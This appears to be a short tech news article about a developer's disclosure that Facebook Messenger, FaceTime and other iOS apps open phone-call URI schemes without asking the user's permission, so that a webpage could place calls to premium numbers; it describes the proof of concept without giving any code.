Andrei Neculaesei, a full-stack Copenhagen based developer, has thrown his hat into the mobile app security debate by expressing concern regarding poorly implemented security relating to URI schemes within many popular apps. Neculaesei believes that the fact that many developers neglect to implement vital security measures within their apps could potentially lead to unwitting users falling victim to malicious services that could, in theory, invoke expensive phones calls on the device being used.
It’s highly likely that the majority of mobile app users have come across a URI scheme at some point during their mobile usage. It’s also highly likely that individual users don’t actually relate the end action with what’s going on in the app’s underlying code.
Uniform Resource Identifiers, or URIs, are frequently used within native mobile apps to trigger a specific action. An example of this could be tapping on an email address to invoke the Mail app in iOS, or tapping on a phone number in Mobile Safari to initiate a phone call to that number using the Phone app.
In many parts of iOS, Apple actually displays a user-facing alert to request permission to carry out the action. Click on a phone number within Mobile Safari and you’ll get a prompt asking if you wish to make a phone call. It’s most definitely classed as an "opt-in" action, with Apple asking for explicit permission from the user to perform the action. However, Neculaesei rightly points out that not all developers implement this permission request, with a number of popular apps like Facebook Messenger, Apple’s own FaceTime and Google’s G+ app all making the call regardless.
In an effort to prove that this behavior could be manipulated, Neculaesei has created a webpage running some relatively simple JavaScript code that executes a phone call on a device when the page is visited from a mobile phone. The demonstration has shown that Facebook’s Messenger, amongst others, would call any number, including expensive premium rate ones, without asking for any kind of permission from the user. Of course, the interface of the device would clearly show the phone call in process with users able to cancel the call at any time, but it definitely provides food for thought.
(via: PCWorld)
You can follow us on Twitter, add us to your circle on Google+ or like our Facebook page to keep yourself updated on all the latest from Microsoft, Google, Apple and the web.